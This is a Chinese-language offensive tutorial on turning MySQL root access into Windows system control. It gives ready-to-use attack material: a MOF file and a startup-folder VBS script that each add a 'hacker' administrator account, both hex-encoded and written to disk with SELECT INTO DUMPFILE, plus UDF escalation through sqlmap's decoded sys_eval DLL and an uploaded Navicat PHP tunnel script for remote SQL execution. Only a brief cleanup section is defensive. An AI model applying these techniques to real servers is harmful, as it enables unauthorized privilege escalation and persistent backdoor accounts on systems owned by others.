MySQL提权

必要条件:

  • 具有MySQL的root权限
  • 具有执行SQL语句的权限

查询MySQL账号密码

1
2
3
4
5
6
# MySQL <= 5.6 版本
mysql> select host, user, password from mysql.user;

# MySQL >= 5.7 版本
mysql > select host,user,authentication_string from mysql.user;
# 查询到的值是Hash加密的

MOF提权

利用了C:\Windows\System32\wbem\MOF目录下的nullevt.mot文件

利用该文件每分钟会去执行一次的特性,向该文件中写入cmd命令,就会被执行

这个 MOF 里面有一部分是 VBS 脚本,所以可以利用这个 VBS 脚本来调用 CMD 来执行系统命令,如果 MySQL 有权限操作 mof 目录的话,就可以来执行任意命令了

利用条件:

  • 只适用于低版本的Windows系统
  • C:\Windows\System32\wbem\MOF目录有读写权限

上传MOF文件内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MySQL 写文件的特性将这个 MOF 文件导入到 C:/Windows/system32/wbem/mof/ 目录下,讲上面的代码转换为16进制,在开头添加0x

1
2
select 0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E2229200A0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C746572200A7B200A202020204576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B200A202020204E616D6520203D202266696C745032223B200A202020205175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200A20202020202020202020202022576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C222022200A20202020202020202020202022416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B200A2020202051756572794C616E6775616765203D202257514C223B200A7D3B200A0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D6572200A7B200A202020204E616D65203D2022636F6E735043535632223B200A20202020536372697074696E67456E67696E65203D20224A536372697074223B200A2020202053637269707454657874203D200A2276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206861636B6572205040737377307264202F6164645C22295C6E5753482E72756E285C226E65742E657865206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F6164645C2229223B200A7D3B200A0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E67200A7B200A20202020436F6E73756D65722020203D2024436F6E73756D65723B200A2020202046696C746572203D20244576656E7446696C7465723B200A7D3B0A 
into dumpfile "C:/windows/system32/wbem/mof/test.mof";

执行成功的的时候,test.mof 会出现在:c:/windows/system32/wbem/goog/ 目录下 否则出现在 c:/windows/system32/wbem/bad 目录下

然后会建立hacker用户

修复措施

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 停止 winmgmt 服务
net stop winmgmt

# 删除 Repository 文件夹
rmdir /s /q C:\Windows\system32\wbem\Repository\

# 手动删除 mof 文件
del C:\Windows\system32\wbem\mof\good\test.mof /F /S

# 删除创建的用户
net user hacker /delete

# 重新启动服务
net start winmgmt

UDF提权

自定义函数,是数据库功能的一种扩展。用户通􏰁自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。

利用条件:

如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件udf.dll放置在mysql安装目录的MySQL\Lib\Plugin\文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建MySQL\Lib\Plugin\文件夹,然后将udf.dll导入到该目录。

如果是 MySQL <= 5.1 的版本,udf.dll文件在windows server 2003下放置于c:/windows/system32/目录,在windows server 2000下放置在c:/winnt/system32/目录。

掌握mysql数据库的root账户,从而拥有对mysql的insert和delete权限,以创建和抛弃函数。

拥有可以将udf.dll写入相应目录的权限

sqlmap 的 UDF 动态链接库文件位置

1
sqlmap/data/udf/mysql

这个dll文件是经过编码的,需要解码,sqlmap解码文件位置

1
sqlmap/extra/clock/cloak.py

解码方法如下

1
2
3
4
5
6
7
8
9
10
11
# 解码 32 位的 Linux 动态链接库
cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so

# 解码 64 位的 Linux 动态链接库
cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so

# 解码 32 位的 Windows 动态链接库
cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

# 解码 64 位的 Windows 动态链接库
cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll

查看MySQL的插件目录

1
show variables like '%plugin%';

如果没有该目录可以手动创建

需要有写入权限

1
2
3
4
5
# 查看MySQL安装目录
select @@basedir;

# 创建/lib/plugin/文件夹
select 1 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation';

把动态链接库写入MySQL

1
2
3
4
5
6
7
8
9
10
11
12
select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll') 
into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'

select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll')
into dumpfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'

# 也可以进行编码
select hex(load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll'))
into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'

sqlmap.py -u http://127.0.0.1/?id=1 --file-write lib_mysqludf_sys_64.dll
--file-dest 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'

创建自定义函数并调用命令

1
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';

查看自定义函数是否创建成功

1
select * from mysql.func;

执行命令

1
select sys_eval('ipconfig');

删除自定义函数

1
drop function sys_eval;

无法直连时通过Navicat上传PHP脚本

脚本代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
<?php	//version my202

//set allowTestMenu to false to disable System/Server test page
$allowTestMenu = true;

$use_mysqli = function_exists("mysqli_connect");

header("Content-Type: text/plain; charset=x-user-defined");
error_reporting(0);
set_time_limit(0);

function phpversion_int()
{
list($maVer, $miVer, $edVer) = preg_split("(/|\.|-)", phpversion());
return $maVer*10000 + $miVer*100 + $edVer;
}

if (phpversion_int() < 50300)
{
set_magic_quotes_runtime(0);
}

function GetLongBinary($num)
{
return pack("N",$num);
}

function GetShortBinary($num)
{
return pack("n",$num);
}

function GetDummy($count)
{
$str = "";
for($i=0;$i<$count;$i++)
$str .= "\x00";
return $str;
}

function GetBlock($val)
{
$len = strlen($val);
if( $len < 254 )
return chr($len).$val;
else
return "\xFE".GetLongBinary($len).$val;
}

function EchoHeader($errno)
{
$str = GetLongBinary(1111);
$str .= GetShortBinary(202);
$str .= GetLongBinary($errno);
$str .= GetDummy(6);
echo $str;
}

function EchoConnInfo($conn)
{
if ($GLOBALS['use_mysqli']) {
$str = GetBlock(mysqli_get_host_info($conn));
$str .= GetBlock(mysqli_get_proto_info($conn));
$str .= GetBlock(mysqli_get_server_info($conn));
echo $str;
} else {
$str = GetBlock(mysql_get_host_info($conn));
$str .= GetBlock(mysql_get_proto_info($conn));
$str .= GetBlock(mysql_get_server_info($conn));
echo $str;
}
}

function EchoResultSetHeader($errno, $affectrows, $insertid, $numfields, $numrows)
{
$str = GetLongBinary($errno);
$str .= GetLongBinary($affectrows);
$str .= GetLongBinary($insertid);
$str .= GetLongBinary($numfields);
$str .= GetLongBinary($numrows);
$str .= GetDummy(12);
echo $str;
}

function EchoFieldsHeader($res, $numfields)
{
$str = "";
for( $i = 0; $i < $numfields; $i++ ) {
if ($GLOBALS['use_mysqli']) {
$finfo = mysqli_fetch_field_direct($res, $i);
$str .= GetBlock($finfo->name);
$str .= GetBlock($finfo->table);

$type = $finfo->type;
$length = $finfo->length;

$str .= GetLongBinary($type);

$intflag = $finfo->flags;
$str .= GetLongBinary($intflag);

$str .= GetLongBinary($length);
} else {
$str .= GetBlock(mysql_field_name($res, $i));
$str .= GetBlock(mysql_field_table($res, $i));

$type = mysql_field_type($res, $i);
$length = mysql_field_len($res, $i);
switch ($type) {
case "int":
if( $length > 11 ) $type = 8;
else $type = 3;
break;
case "real":
if( $length == 12 ) $type = 4;
elseif( $length == 22 ) $type = 5;
else $type = 0;
break;
case "null":
$type = 6;
break;
case "timestamp":
$type = 7;
break;
case "date":
$type = 10;
break;
case "time":
$type = 11;
break;
case "datetime":
$type = 12;
break;
case "year":
$type = 13;
break;
case "blob":
if( $length > 16777215 ) $type = 251;
elseif( $length > 65535 ) $type = 250;
elseif( $length > 255 ) $type = 252;
else $type = 249;
break;
default:
$type = 253;
}
$str .= GetLongBinary($type);

$flags = explode( " ", mysql_field_flags ( $res, $i ) );
$intflag = 0;
if(in_array( "not_null", $flags )) $intflag += 1;
if(in_array( "primary_key", $flags )) $intflag += 2;
if(in_array( "unique_key", $flags )) $intflag += 4;
if(in_array( "multiple_key", $flags )) $intflag += 8;
if(in_array( "blob", $flags )) $intflag += 16;
if(in_array( "unsigned", $flags )) $intflag += 32;
if(in_array( "zerofill", $flags )) $intflag += 64;
if(in_array( "binary", $flags)) $intflag += 128;
if(in_array( "enum", $flags )) $intflag += 256;
if(in_array( "auto_increment", $flags )) $intflag += 512;
if(in_array( "timestamp", $flags )) $intflag += 1024;
if(in_array( "set", $flags )) $intflag += 2048;
$str .= GetLongBinary($intflag);

$str .= GetLongBinary($length);
}
}
echo $str;
}

function EchoData($res, $numfields, $numrows)
{
for( $i = 0; $i < $numrows; $i++ ) {
$str = "";
$row = null;
if ($GLOBALS['use_mysqli'])
$row = mysqli_fetch_row( $res );
else
$row = mysql_fetch_row( $res );
for( $j = 0; $j < $numfields; $j++ ){
if( is_null($row[$j]) )
$str .= "\xFF";
else
$str .= GetBlock($row[$j]);
}
echo $str;
}
}


function doSystemTest()
{
function output($description, $succ, $resStr) {
echo "<tr><td class=\"TestDesc\">$description</td><td ";
echo ($succ)? "class=\"TestSucc\">$resStr[0]</td></tr>" : "class=\"TestFail\">$resStr[1]</td></tr>";
}
output("PHP version >= 4.0.5", phpversion_int() >= 40005, array("Yes", "No"));
output("mysql_connect() available", function_exists("mysql_connect"), array("Yes", "No"));
output("mysqli_connect() available", function_exists("mysqli_connect"), array("Yes", "No"));
if (phpversion_int() >= 40302 && substr($_SERVER["SERVER_SOFTWARE"], 0, 6) == "Apache" && function_exists("apache_get_modules")){
if (in_array("mod_security2", apache_get_modules()))
output("Mod Security 2 installed", false, array("No", "Yes"));
}
}

/////////////////////////////////////////////////////////////////////////////
////

if (phpversion_int() < 40005) {
EchoHeader(201);
echo GetBlock("unsupported php version");
exit();
}

if (phpversion_int() < 40010) {
global $HTTP_POST_VARS;
$_POST = &$HTTP_POST_VARS;
}

if (!isset($_POST["actn"]) || !isset($_POST["host"]) || !isset($_POST["port"]) || !isset($_POST["login"])) {
$testMenu = $allowTestMenu;
if (!$testMenu){
EchoHeader(202);
echo GetBlock("invalid parameters");
exit();
}
}

if (!$testMenu){
if ($_POST["encodeBase64"] == '1') {
for($i=0;$i<count($_POST["q"]);$i++)
$_POST["q"][$i] = base64_decode($_POST["q"][$i]);
}

if (!function_exists("mysql_connect") && !function_exists("mysqli_connect")) {
EchoHeader(203);
echo GetBlock("MySQL not supported on the server");
exit();
}

$errno_c = 0;
$hs = $_POST["host"];
if ($use_mysqli) {
if( $_POST["port"] )
$conn = mysqli_connect($hs, $_POST["login"], $_POST["password"], "", $_POST["port"]);
else
$conn = mysqli_connect($hs, $_POST["login"], $_POST["password"]);
$errno_c = mysqli_connect_errno($conn);
if($errno_c > 0) {
EchoHeader($errno_c);
echo GetBlock(mysqli_connect_error($conn));
exit;
}

if(($errno_c <= 0) && ( $_POST["db"] != "" )) {
$res = mysqli_select_db($conn, $_POST["db"] );
$errno_c = mysqli_errno($conn);
}

EchoHeader($errno_c);
if($errno_c > 0) {
echo GetBlock(mysqli_error($conn));
} elseif($_POST["actn"] == "C") {
EchoConnInfo($conn);
} elseif($_POST["actn"] == "Q") {
for($i=0;$i<count($_POST["q"]);$i++) {
$query = $_POST["q"][$i];
if($query == "") continue;
if (phpversion_int() < 50400){
if(get_magic_quotes_gpc())
$query = stripslashes($query);
}
$res = mysqli_query($conn, $query);
$errno = mysqli_errno($conn);
$affectedrows = mysqli_affected_rows($conn);
$insertid = mysqli_insert_id($conn);
if (false !== $res) {
$numfields = mysqli_field_count($conn);
$numrows = mysqli_num_rows($res);
}
else {
$numfields = 0;
$numrows = 0;
}
EchoResultSetHeader($errno, $affectedrows, $insertid, $numfields, $numrows);
if($errno > 0)
echo GetBlock(mysqli_error($conn));
else {
if($numfields > 0) {
EchoFieldsHeader($res, $numfields);
EchoData($res, $numfields, $numrows);
} else {
if(phpversion_int() >= 40300)
echo GetBlock(mysqli_info($conn));
else
echo GetBlock("");
}
}
if($i<(count($_POST["q"])-1))
echo "\x01";
else
echo "\x00";
if (false !== $res)
mysqli_free_result($res);
}
}
} else {
if( $_POST["port"] ) $hs .= ":".$_POST["port"];
$conn = mysql_connect($hs, $_POST["login"], $_POST["password"]);
$errno_c = mysql_errno();
//if (phpversion_int() >= 50203){ // for unicode database name
// mysql_set_charset('UTF8');
//}
if(($errno_c <= 0) && ( $_POST["db"] != "" )) {
$res = mysql_select_db( $_POST["db"], $conn);
$errno_c = mysql_errno();
}

EchoHeader($errno_c);
if($errno_c > 0) {
echo GetBlock(mysql_error());
} elseif($_POST["actn"] == "C") {
EchoConnInfo($conn);
} elseif($_POST["actn"] == "Q") {
for($i=0;$i<count($_POST["q"]);$i++) {
$query = $_POST["q"][$i];
if($query == "") continue;
if (phpversion_int() < 50400){
if(get_magic_quotes_gpc())
$query = stripslashes($query);
}
$res = mysql_query($query, $conn);
$errno = mysql_errno();
$affectedrows = mysql_affected_rows($conn);
$insertid = mysql_insert_id($conn);
$numfields = mysql_num_fields($res);
$numrows = mysql_num_rows($res);
EchoResultSetHeader($errno, $affectedrows, $insertid, $numfields, $numrows);
if($errno > 0)
echo GetBlock(mysql_error());
else {
if($numfields > 0) {
EchoFieldsHeader($res, $numfields);
EchoData($res, $numfields, $numrows);
} else {
if(phpversion_int() >= 40300)
echo GetBlock(mysql_info($conn));
else
echo GetBlock("");
}
}
if($i<(count($_POST["q"])-1))
echo "\x01";
else
echo "\x00";
mysql_free_result($res);
}
}
}
exit();
}

header("Content-Type: text/html");
////
/////////////////////////////////////////////////////////////////////////////
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Navicat HTTP Tunnel Tester</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<style type="text/css">
body{
margin: 30px;
font-family: Tahoma;
font-weight: normal;
font-size: 14px;
color: #222222;
}
table{
width: 100%;
border: 0px;
}
input{
font-family:Tahoma,sans-serif;
border-style:solid;
border-color:#666666;
border-width:1px;
}
fieldset{
border-style:solid;
border-color:#666666;
border-width:1px;
}
.Title1{
font-size: 30px;
color: #003366;
}
.Title2{
font-size: 10px;
color: #999966;
}
.TestDesc{
width:70%
}
.TestSucc{
color: #00BB00;
}
.TestFail{
color: #DD0000;
}
.mysql{
}
.pgsql{
display:none;
}
.sqlite{
display:none;
}
#page{
max-width: 42em;
min-width: 36em;
border-width: 0px;
margin: auto auto;
}
#host, #dbfile{
width: 300px;
}
#port{
width: 75px;
}
#login, #password, #db{
width: 150px;
}
#Copyright{
text-align: right;
font-size: 10px;
color: #888888;
}
</style>
<script type="text/javascript">
function getInternetExplorerVersion(){
var ver = -1;
if (navigator.appName == "Microsoft Internet Explorer"){
var regex = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
if (regex.exec(navigator.userAgent))
ver = parseFloat(RegExp.$1);
}
return ver;
}
function setText(element, text, succ){
element.className = (succ)?"TestSucc":"TestFail";
element.innerHTML = text;
}
function getByteAt(str, offset){
return str.charCodeAt(offset) & 0xff;
}
function getIntAt(binStr, offset){
return (getByteAt(binStr, offset) << 24)+
(getByteAt(binStr, offset+1) << 16)+
(getByteAt(binStr, offset+2) << 8)+
(getByteAt(binStr, offset+3) >>> 0);
}
function getBlockStr(binStr, offset){
if (getByteAt(binStr, offset) < 254)
return binStr.substring(offset+1, offset+1+binStr.charCodeAt(offset));
else
return binStr.substring(offset+5, offset+5+getIntAt(binStr, offset+1));
}
function doServerTest(){
var version = getInternetExplorerVersion();
if (version==-1 || version>=9.0){
var xmlhttp = (window.XMLHttpRequest)? new XMLHttpRequest() : xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");

xmlhttp.onreadystatechange=function(){
var outputDiv = document.getElementById("ServerTest");
if (xmlhttp.readyState == 4){
if (xmlhttp.status == 200){
var errno = getIntAt(xmlhttp.responseText, 6);
if (errno == 0)
setText(outputDiv, "Connection Success!", true);
else
setText(outputDiv, parseInt(errno)+" - "+getBlockStr(xmlhttp.responseText, 16), false);
}else
setText(outputDiv, "HTTP Error - "+xmlhttp.status, false);
}
}

var params = "";
var form = document.getElementById("TestServerForm");
for (var i=0; i<form.elements.length; i++){
if (i>0) params += "&";
params += form.elements[i].id+"="+form.elements[i].value.replace("&", "%26");
}

document.getElementById("ServerTest").className = "";
document.getElementById("ServerTest").innerHTML = "Connecting...";
xmlhttp.open("POST", "", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(params);
}else{
document.getElementById("ServerTest").className = "";
document.getElementById("ServerTest").innerHTML = "Internet Explorer "+version+" is not supported, please use Internet explorer 9.0 or above, firefox, chrome or safari";
}
}
</script>
</head>

<body>
<div id="page">
<p>
<font class="Title1">Navicat&trade;</font><br>
<font class="Title2">The gateway to your database!</font>
</p>
<fieldset>
<legend>System Environment Test</legend>
<table>
<tr style="<?php echo "display:none"; ?>"><td width=70%>PHP installed properly</td><td class="TestFail">No</td></tr>
<?php echo doSystemTest();?>
</table>
</fieldset>
<br>
<fieldset>
<legend>Server Test</legend>
<form id="TestServerForm" action="#" onSubmit="return false;">
<input type=hidden id="actn" value="C">
<table>
<tr class="mysql"><td width="35%">Hostname/IP Address:</td><td><input type=text id="host" placeholder="localhost"></td></tr>
<tr class="mysql"><td>Port:</td><td><input type=text id="port" placeholder="3306"></td></tr>
<tr class="pgsql"><td>Initial Database:</td><td><input type=text id="db" placeholder="template1"></td></tr>
<tr class="mysql"><td>Username:</td><td><input type=text id="login" placeholder="root"></td></tr>
<tr class="mysql"><td>Password:</td><td><input type=password id="password" placeholder=""></td></tr>
<tr class="sqlite"><td>Database File:</td><td><input type=text id="dbfile" placeholder="sqlite.db"></td></tr>
<tr><td></td><td><br><input id="TestButton" type="submit" value="Test Connection" onClick="doServerTest()"></td></tr>
</table>
</form>
<div id="ServerTest"><br></div>
</fieldset>
<p id="Copyright">Copyright &copy; PremiumSoft &trade; CyberTech Ltd. All Rights Reserved.</p>
</div>
</body>
</html>

然后连接Navicat,选择HTTP通道,输入带有php脚本的远程链接

然后地址选择本地localhost选择连接,然后就可以执行MySQL命令了

启动项提权

当 Windows 的启动项可以被 MySQL 写入的时候可以使用 MySQL 将自定义脚本导入到启动项中,这个脚本会在用户登录、开机、关机的时候自动运行。

启动项路径

Windows Server 2003 的启动项路径

1
2
3
4
5
6
7
8
9
10
11
# 中文系统
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
C:\Documents and Settings\All Users\「开始」菜单\程序\启动

# 英文系统
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

# 开关机项 需要自己建立对应文件夹
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Shutdown

Windows Server 2008 的启动项路径

1
2
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

既然知道路径的话就往启动项路径里面写入脚本吧,脚本支持 vbs 和 exe 类型,可以利用 vbs 执行一些 CMD 命令,也可以使用 exe 上线 MSF 或者 CS 这方面还是比较灵活的。下面是一个执行基础命令的 VB 脚本

1
2
3
Set WshShell=WScript.CreateObject("WScript.Shell")
WshShell.Run "net user hacker P@ssw0rd /add", 0
WshShell.Run "net localgroup administrators hacker /add", 0

将上述 vbs 或者 CS 的马转十六进制直接写如到系统启动项中,然后等待系统用户重新登录

1
mysql > select 0x536574205773685368656C6C3D575363726970742E4372656174654F626A6563742822575363726970742E5368656C6C22290A5773685368656C6C2E52756E20226E65742075736572206861636B6572205040737377307264202F616464222C20300A5773685368656C6C2E52756E20226E6574206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F616464222C20300A into dumpfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\test.vbs";